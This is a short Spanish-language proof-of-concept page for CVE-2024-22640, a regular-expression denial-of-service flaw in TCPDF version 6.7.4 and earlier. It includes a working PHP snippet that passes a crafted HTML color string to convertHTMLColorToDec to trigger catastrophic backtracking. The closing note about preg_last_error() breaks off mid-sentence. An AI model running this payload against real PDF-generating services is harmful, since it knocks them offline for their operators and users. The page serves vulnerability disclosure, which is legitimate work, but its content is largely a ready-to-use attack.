
Exploit de prueba de concepto para CVE-2024-22640, una vulnerabilidad ReDoS en TCPDF <=6.7.4 activada por entrada de color HTML manipulada, con código de demostración.
Denegación de servicio por expresión regular (ReDoS)
TCPDF <= 6.7.4
El análisis de color HTML de TCPDF contiene una carga útil manipulada.
TCPDF versión <= 6.7.4 es vulnerable a ReDoS (Denegación de servicio por expresión regular) si analiza una página HTML no confiable con un color manipulado.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Nota: Al comprobar con preg_last_error() después de la línea vulnerable de código, la expresión regular terminará con .